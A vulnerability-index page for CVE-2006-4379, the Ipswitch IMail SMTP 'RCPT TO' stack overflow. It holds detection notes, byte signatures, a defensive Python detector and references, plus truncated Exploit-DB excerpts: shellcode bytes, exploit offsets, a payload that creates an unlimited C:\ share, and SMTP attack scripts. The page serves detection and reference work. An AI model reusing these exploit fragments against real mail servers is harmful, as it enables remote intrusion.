CVE-2006-4379
Published 2006-09-08
Priority: P260 · high · 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 60.04% (99.0th percentile)
Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows remote attackers to execute arbitrary code via a long string located after an '@' character and before a ':' character.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | imail_plus | — | — |
| ipswitch | imail_secure_server | — | — |
| ipswitch | ipswitch_collaboration_suite | — | — |
| ipswitch | ipswitch_collaboration_suite | — | — |
Detection & IOCs
- bytes: \x81\xc4\xff\xef\xff\xff\x44
- bytes: \xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58
- bytes: \x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93
- Detect oversized RCPT TO commands where a long string appears between '@' and ':' characters; this is the specific trigger pattern for the stack overflow.
- Alert on SMTP RCPT TO commands exceeding normal length bounds (>560 bytes) targeting port 25 on Ipswitch IMail servers.
- Monitor for SMTP sessions that send EHLO, MAIL FROM, then a malformed RCPT TO with embedded null-free shellcode; the exploit sequence is EHLO → MAIL FROM → malicious RCPT TO.
- Bad characters for payload encoding are \x00 \x0d \x0a \x20 \x3e \x22 \x40; absence of these bytes in a long RCPT TO argument is a strong indicator of encoded shellcode.
- After successful exploitation, watch for a bind shell on TCP port 4444 on the victim IMail server.
- The exploit targets SmtpDLL.dll / SMTPDLL.DLL ROP gadgets; monitor for abnormal return addresses into these DLLs (0x10036f71, 0x100188c3, 0x100191c4) in crash dumps or memory forensics.
- The overflow is only triggered when the long string is positioned specifically after '@' and before ':' in the RCPT TO argument; generic SMTP length checks on the full command line may miss this if they do not parse the internal structure.
- The exploit requires the payload to be free of restricted bytes (\x00 \x0d \x0a \x20 \x3e \x22 \x40); detection signatures based solely on these bytes will miss encoded payloads.
- The ROP gadget addresses differ across IMail versions and Windows OS/SP combinations; a single return-address signature will not cover all exploit variants.
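The structural check described in the notes above, as an added example (not code from this page or from any of the indexed exploit authors): it parses each client command, measures the span after the first '@' and before the next ':', and reports why a line was flagged. The function names are hypothetical, the 560-byte command bound is the page's figure, and the 255-byte span bound is an assumption taken from the RFC 5321 limit on a domain; the sample session is constructed filler.

```python
import re

MAX_CMD_LEN = 560     # from the page: RCPT TO commands longer than 560 bytes
MAX_DOMAIN_LEN = 255  # assumption: RFC 5321 domain limit, used as the span bound
RESTRICTED = frozenset(b"\x00\x0d\x0a\x20\x3e\x22\x40")  # restricted bytes listed on the page
RCPT_RE = re.compile(rb"^\s*RCPT\s+TO\s*:\s*(.*)$", re.IGNORECASE | re.DOTALL)


def inspect_rcpt(line: bytes) -> list:
    """Return the reasons one client command line matches the trigger pattern."""
    line = line.rstrip(b"\r\n")
    m = RCPT_RE.match(line)
    if not m:
        return []
    reasons = []
    if len(line) > MAX_CMD_LEN:
        reasons.append("oversized-command")
    arg = m.group(1)
    at = arg.find(b"@")
    colon = arg.find(b":", at + 1) if at != -1 else -1
    if colon != -1:
        span = arg[at + 1:colon]  # bytes after the first '@' and before the next ':'
        if len(span) > MAX_DOMAIN_LEN:
            reasons.append("long-at-colon-span")
            if RESTRICTED.isdisjoint(span):
                reasons.append("span-free-of-restricted-bytes")
    return reasons


def scan_session(client_lines) -> list:
    """Return (line_index, reasons) for each flagged command in one SMTP session."""
    hits = []
    for i, line in enumerate(client_lines):
        reasons = inspect_rcpt(line)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample session; filler bytes only, no payload.
SAMPLE = [
    b"EHLO client.example\r\n",
    b"MAIL FROM:<alice@example.org>\r\n",
    b"RCPT TO:<bob@example.org>\r\n",
    b"RCPT TO:<bob@[IPv6:2001:db8::1]>\r\n",
    b"RCPT TO:<bob@" + b"A" * 300 + b":x>\r\n",
    b"RCPT TO:<bob@" + b"A" * 600 + b":x>\r\n",
    b"RCPT TO:<" + b"A" * 600 + b">\r\n",
]
```

The fifth sample line is under 560 bytes overall and is caught only by the span check, which is the gap a whole-line length rule leaves; the IPv6 address literal shows that a legitimate ':' after '@' does not trip it.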
No detection rules found.
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb·2021-08-18·CVSS 7.5
CVE-2006-1236 [HIGH] crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
---
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56
Exploit-DB
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow
exploitdb·2007-02-04
CVE-2006-4379 Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow
---
#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
# https://www.securityfocus.com/bid/19885
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $buffer;
send $
Exploit-DB
Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)
exploitdb·2007-02-04
CVE-2006-4379 Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini ', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv'
Exploit-DB
Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow
exploitdb·2006-10-19
CVE-2006-4379 Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow
---
// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update
#include
#include
#include
#include
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1028];
// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\
No writeups or analysis indexed.
- http://secunia.com/advisories/21795
- http://securitytracker.com/id?1016803
- http://securitytracker.com/id?1016804
- http://www.ipswitch.com/support/ics/updates/ics20061.asp
- http://www.ipswitch.com/support/imail/releases/im20061.asp
- http://www.securityfocus.com/archive/1/445521/100/0/threaded
- http://www.securityfocus.com/bid/19885
- http://www.vupen.com/english/advisories/2006/3496
- http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28789
Published: 2006-09-08